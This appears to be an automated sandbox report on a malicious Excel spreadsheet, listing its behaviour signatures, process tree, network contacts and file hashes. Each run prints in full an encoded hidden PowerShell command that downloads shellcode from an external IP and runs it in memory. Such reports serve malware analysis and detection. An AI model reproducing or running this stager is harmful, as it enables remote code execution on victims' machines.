Analysis Overview
SHA256
34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1
Threat Level: Known bad
The file 34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Command and Scripting Interpreter: PowerShell
Office macro that triggers on suspicious action
Blocklisted process makes network request
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 21:52
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 21:52
Reported
2024-11-13 21:53
Platform
win7-20240903-en
Max time kernel
33s
Max time network
17s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1.xls
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d7w20nqs.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES517B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC517A.tmp"
Network
| Country | Destination | Domain | Proto |
| CH | 194.182.164.149:8080 | tcp |
Files
memory/2664-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2664-1-0x000000007264D000-0x0000000072658000-memory.dmp
memory/2664-8-0x0000000006DD0000-0x0000000006ED0000-memory.dmp
memory/2664-9-0x0000000006DD0000-0x0000000006ED0000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\d7w20nqs.cmdline
| MD5 | 44346db26ec2ca14942f5c2facc01898 |
| SHA1 | 63dfc99c1f59712430a1c2f5f8344fb649168f60 |
| SHA256 | d1409e8c4dd593bdb0da61a5c981a6f5b96a2903a9421cf6531c594591ab8534 |
| SHA512 | dbbfe262cb823a584887eb1cc375c2ba5adc2b94fed3d997bb0d52a4735e86f5472d2b3b6d87176573260eca1f08963b8af29ee71e9529a1b2a0f8014c2a38fa |
\??\c:\Users\Admin\AppData\Local\Temp\d7w20nqs.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\CSC517A.tmp
| MD5 | 8cbab4325fafefc2a71d1c9477ff663e |
| SHA1 | ca02a1618aa32638dfa2455e8bb806b004e186ab |
| SHA256 | 8cfae9e5b20dee8a48c68da6098f758a563af2a57b8393c632993d9f32f58a5c |
| SHA512 | 5485d7972a582e589a98971642967cfc7f5650ecb0e61f0539f44d40a5c3607aadc8467423d1dcc42c685e54c2d4f264ca17ebc35ac2c5ee565a890df4ddf1c7 |
C:\Users\Admin\AppData\Local\Temp\RES517B.tmp
| MD5 | 7549c28572197fbf5c956a4136afe557 |
| SHA1 | 83066fd47fe074f8c0561a90e8eceb5c1eecf319 |
| SHA256 | 81c03b959e2adece930ad5058281f5294a8452ba156e42c069fc199fec8d0f37 |
| SHA512 | baedaecbe039d5f809d3d696acab105a3d00ca6306200386d8a3ebce329a2b6301adf8af8322a6a84d63ae9e74f755b4955eb3d95cab856dd2a479ded4c27421 |
C:\Users\Admin\AppData\Local\Temp\d7w20nqs.dll
| MD5 | 1b802a6c9b1333c0c7ffac5ac409713c |
| SHA1 | abfe6102241fb7f5e2cd37363e0d64484b6504b4 |
| SHA256 | 12484eda3d2aaba580cd1e80db254604c98027fd0e11ef1650aaff9f9dd90bd5 |
| SHA512 | cfef67ff95e474d868d39b7456e8ebbfcfe7687a42446809c98e8b16fcc5bd416bb6f5f410665a19a5574b23bd5c9fa3f670e3ddde28553f51534408f7a18e78 |
C:\Users\Admin\AppData\Local\Temp\d7w20nqs.pdb
| MD5 | f1018dac594ee883257b945f55fecd2b |
| SHA1 | 95a73fdae11ba930a54123d6d35ac5337bf1bd46 |
| SHA256 | f4facd5bb97a27525a5f250d54e49b18cea4a254c84b012f006ea2250099415f |
| SHA512 | 86a5f30db5a98b1a6596b2a68463a0392a44904c58138517691bef9da841011d2d1098ecb93e770a68b8b212cdbafb808dd6707b1fd21fdd5507896f610fea6f |
memory/2664-27-0x000000007264D000-0x0000000072658000-memory.dmp
memory/2664-28-0x0000000006DD0000-0x0000000006ED0000-memory.dmp
memory/2664-29-0x0000000006DD0000-0x0000000006ED0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 21:52
Reported
2024-11-13 21:53
Platform
win10v2004-20241007-en
Max time kernel
33s
Max time network
35s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2040 wrote to memory of 3524 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2040 wrote to memory of 3524 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3524 wrote to memory of 1588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 3524 wrote to memory of 1588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 1588 wrote to memory of 3016 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 1588 wrote to memory of 3016 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1.xls"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp" "c:\Users\Admin\AppData\Local\Temp\bbguofy5\CSCF022F0707A554A768A12D6D0ED7FEC5A.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| CH | 194.182.164.149:8080 | tcp | |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
Files
memory/2040-0-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp
memory/2040-1-0x00007FFA1DA0D000-0x00007FFA1DA0E000-memory.dmp
memory/2040-2-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp
memory/2040-3-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp
memory/2040-4-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp
memory/2040-8-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-11-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-12-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-10-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-13-0x00007FF9DB5E0000-0x00007FF9DB5F0000-memory.dmp
memory/2040-9-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-7-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-14-0x00007FF9DB5E0000-0x00007FF9DB5F0000-memory.dmp
memory/2040-16-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-18-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-21-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-20-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-19-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-17-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-23-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-22-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-15-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-6-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-5-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp
memory/2040-33-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-32-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsgymzgt.fc1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3524-45-0x00000248575E0000-0x0000024857602000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.cmdline
| MD5 | 5b48498f851129ecf57c2e0faf9011cc |
| SHA1 | 78687940f626de320832a42035aeb21a69d52239 |
| SHA256 | 664fb67cde2a61f02b3b876240461ccce8ad2c230489a20290e62a34d6d2bfd7 |
| SHA512 | 1f6f5a7a4299f037d00a3d6754c5a1a5f94d1cc43d8dc1dec54e974894b1a25721a28de3b7cfddf8cf8decfe8f48964c1426e220279d177361d70c4b144d8f6e |
\??\c:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\bbguofy5\CSCF022F0707A554A768A12D6D0ED7FEC5A.TMP
| MD5 | d1ff064f91438a38870f318743eac1b9 |
| SHA1 | 50d7576ca1ba37866fad04a01077f8881c2f5a84 |
| SHA256 | aeab426bf320e7dc8a75d8c018f45d71fe94fe497654d980e5468b2d8d47ecd1 |
| SHA512 | ba9480f0d34bc3822a29257a99df00021b7bb0a880b43d74100f09113d55b65521184bd1564cb26122e23fcc90a707dca8be62cc2719652b216adf99027572df |
